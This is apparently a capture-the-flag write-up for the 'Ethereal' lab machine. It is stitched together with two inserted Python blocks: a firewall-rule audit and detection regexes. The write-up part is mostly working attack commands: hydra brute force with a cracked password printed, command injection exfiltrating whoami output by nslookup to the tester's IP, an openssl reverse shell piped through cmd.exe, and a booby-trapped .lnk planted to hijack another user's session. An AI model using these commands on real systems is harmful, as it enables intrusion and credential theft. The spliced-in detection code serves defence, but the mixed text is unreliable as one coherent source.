a guest
Nov 3rd, 2018
so to check FDISK, DISK1, DISK2 contents we can run:
mkdir -p ./mnt/FDISK && mount -o loop FDISK ./mnt/FDISK
mkdir -p ./mnt/DISK1 && mount -o loop DISK1 ./mnt/DISK1
mkdir -p ./mnt/DISK2 && mount -o loop DISK2 ./mnt/DISK2

so in FDISK we manage to find pbox.exe and pbox.dat
after researching I found pbox.exe is somewhat linked to an old emulator for games and DOS programs named "DOSBOX"
and we can install it in our kali with apt-get install dosbox
Now in dosbox we can mount our files like this:
mount c /path/to/box/files
running pbox.exe asks for cwsdpmi.zip, it's some sort of a dependency, so we download it from here:
https://www.dosgames/com/files/cwsdpmi.zip
and extract and place it on /mnt/FDISK/pbox/
now we can mount our path and run pbox.exe, which asks for a password, so we use the most common password: "password"
and we are in.

4) now some sort of database program shows up; every time we select one item it shows us a user and a password, so we can make a list out of it and crack it through hydra

hydra -L user.txt -P password.txt http-get://ethereal.htb:8080

and was able to get basic auth:

user: alan
password: !C414m17y57r1k3s4g41n!

we test it on our port 8080 site and we are in with an admin console and a test box that shows "test connection".
so I immediately go and test with my IP showing and see that the connection is successful.

Then tried appending commands after the ping command using &&, ||, |

Was able to run commands at first with
|| for /f "tokens" %i in ('whoami') do nslookup %i 10.10.15.110
without my IP address, which shows me the name 'etherealalan' in the wireshark results.

If I played with the token number I was able to see whichever word of a response I selected as the token number.
e.g. if the response to whoami was "ethereal\alan", the backslash character does not travel through the results we can view, so token=1 would give me the word etherealalan, whereas if I did the command "echo test 123", token=1 would show test and token=2 would show 123.

At this point it was safe to say we were dealing with blind read-only RCE.
Enumerating this way was an absolute pain and I had to check my other options.

Since I knew I couldn't execute anything, I wanted to know why.

I checked the firewall rules, using:
netsh advfirewall firewall show rule name=all

this showed ports 73 and 136 are open and openssl.exe is installed.
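From the defender's side, the same netsh output can be checked for enabled outbound Allow rules on ports outside an expected baseline, which is exactly what let a local openssl.exe dial out here. Added example, not from this writeup: Python over a constructed, trimmed sample of netsh output; BASELINE_PORTS is an assumed allowlist.

```python
import re

# Constructed sample of `netsh advfirewall firewall show rule name=all` output,
# trimmed to the fields this check reads (not taken from the page's target).
SAMPLE_NETSH = """\
Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Protocol:                             UDP
RemotePort:                           53
Action:                               Allow

Rule Name:                            Allow Outbound 73
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Protocol:                             TCP
RemotePort:                           73
Action:                               Allow

Rule Name:                            Allow Outbound 136
----------------------------------------------------------------------
Enabled:                              No
Direction:                            Out
Protocol:                             TCP
RemotePort:                           136
Action:                               Allow
"""

# Assumed baseline: remote ports an enabled outbound Allow rule may use unflagged.
BASELINE_PORTS = {"53", "80", "443", "Any"}


def parse_rules(text):
    """One dict of field -> value per rule block of netsh output."""
    rules = []
    for block in re.split(r"\n\s*\n", text.strip()):
        pairs = (line.partition(":") for line in block.splitlines())
        fields = {k.strip(): v.strip() for k, _, v in pairs if not k.startswith("---")}
        if "Rule Name" in fields:
            rules.append(fields)
    return rules


def unusual_outbound_allows(text, baseline=BASELINE_PORTS):
    """Enabled outbound Allow rules whose remote port is off the baseline."""
    return [(r["Rule Name"], r.get("Protocol"), r["RemotePort"])
            for r in parse_rules(text)
            if r.get("Enabled") == "Yes" and r.get("Direction") == "Out"
            and r.get("Action") == "Allow"
            and r.get("RemotePort", "Any") not in baseline]
```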

so we can do this:
-first we create our key.pem and cert.pem with this command:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

-then we set up our first terminal and launch this command to listen on port 73:

openssl s_server -quiet -key key.pem -cert cert.pem -port 73

-now on a second terminal we run this command to listen for connections on port 136:

openssl s_server -quiet -key key.pem -cert cert.pem -port 136

and finally from the admin console we launch this command:

10.10.15.110 | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.15.110:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.15.110:136


Now I was trying to run commands as it is on the shell I got, but nothing seemed to work. Then by mistake I typed a dir command and hit send to see if it works; then, trying to open another shell with the web admin console, I didn't stop my previous shell and ran the command again and, like magic, the command worked!

So to run commands we must type the command in the port 73 terminal, then send the admin console web command, and it gets executed!
Now we have to find a way to upload files; researching, we came to an easy solution

on my kali:

openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < uploadme.txt

on the webapp:

10.10.15.110 | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.15.110:73 > c:\users\public\desktop\shortcuts\saveme.txt

while enumerating we found a file located in c:\users\public\desktop\note-draft.txt which said:
"I've created a shortcut for VS on the Public Desktop to ensure we use the same version. Please delete any existing shortcuts and use this one instead.
-Alan"
this is useful to run a command and automatically respond if it wants an answer:
echo yes | command to run


Now we have to replace the lnk file located on C:\users\public\desktop\shortcut\"Visual Studio 2017.lnk"

so we can generate one with this program

LNKUp (on github)

python generate.py --host localhost --type ntlm --output pay.lnk --execute "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.15.110:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.15.110:136"

then we can encode it in base64 doing

openssl base64 -A -e -in pay.lnk -out pay

then copy the encoded string, go to the windows machine and run this command:

echo | set /p="base64 encoded string" > c:/users/public/desktop/shortcuts/pipo.txt

next step is to decode the file in which we put the encoded string and at the same time replace the visual studio .lnk
so we navigate to the dir containing the .lnk file and do this:

cd c:\users\public\desktop\shortcuts
c:\progra~2\openssl-v1.1.0\bin\openssl base64 -A -d -in pipo.txt -out "Visual Studio 2017.lnk"
type c:\users\public\desktop\shortcuts\"Visual Studio 2017.lnk"
(to check if the lnk got replaced)
then if it got replaced you have to kill the 2 shell connections and start them again to wait for jorge's connection:
***note***
We have to be precise with timing because it seems the lnk file gets replaced by the original every few minutes, so maybe it will not work the first time because of timing.

Once we have the connection we can now read the user flag.
type c:\users\jorge\desktop\user.txt
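Each step of the chain above (the for /f + nslookup DNS trick, openssl s_client piped into cmd.exe, the echo | set /p= base64 drop, and openssl base64 -d writing a .lnk) leaves a distinctive process command line, which is where detection belongs. Added example, not part of this paste: Python rules run over constructed sample command lines; 198.51.100.7 is a documentation address standing in for the attacker host.

```python
import re

# Constructed sample process command lines (as logged by Sysmon event 1 or
# Security event 4688); 198.51.100.7 is a documentation address, not a host.
SAMPLE_CMDLINES = [
    r"cmd.exe /c ping 198.51.100.7",
    r"""cmd.exe /c ping 198.51.100.7 || for /f "tokens=1" %i in ('whoami') do nslookup %i 198.51.100.7""",
    r"C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 198.51.100.7:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 198.51.100.7:136",
    r'cmd.exe /c echo | set /p="QUJDRA==" > c:\users\public\desktop\shortcuts\pipo.txt',
    r'c:\progra~2\openssl-v1.1.0\bin\openssl base64 -A -d -in pipo.txt -out "Visual Studio 2017.lnk"',
    r"openssl.exe s_client -connect updates.example.com:443",
]

# One pattern per step of the chain; all are matched case-insensitively.
RULES = {
    "dns_exfil_for_loop": re.compile(
        r"\bfor\s+/f\b.*\bnslookup\b.*\d{1,3}(\.\d{1,3}){3}", re.I),
    "openssl_client_to_cmd": re.compile(
        r"openssl(\.exe)?\s+s_client\b.*\|\s*cmd(\.exe)?\b", re.I),
    "base64_drop_via_set_p": re.compile(
        r"\becho\s*\|\s*set\s+/p=.*>\s*\S+", re.I),
    "openssl_decode_to_lnk": re.compile(
        r"openssl(\.exe)?\s+base64\b.*\s-d\b.*\.lnk", re.I),
}


def classify(cmdline):
    """Names of every rule that matches one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(cmdlines):
    """(rule, cmdline) pairs for every command line that trips a rule."""
    return [(name, c) for c in cmdlines for name in classify(c)]
```

A plain openssl s_client to a web port (last sample line) trips nothing; it is the pipe into cmd.exe that makes the pattern distinctive.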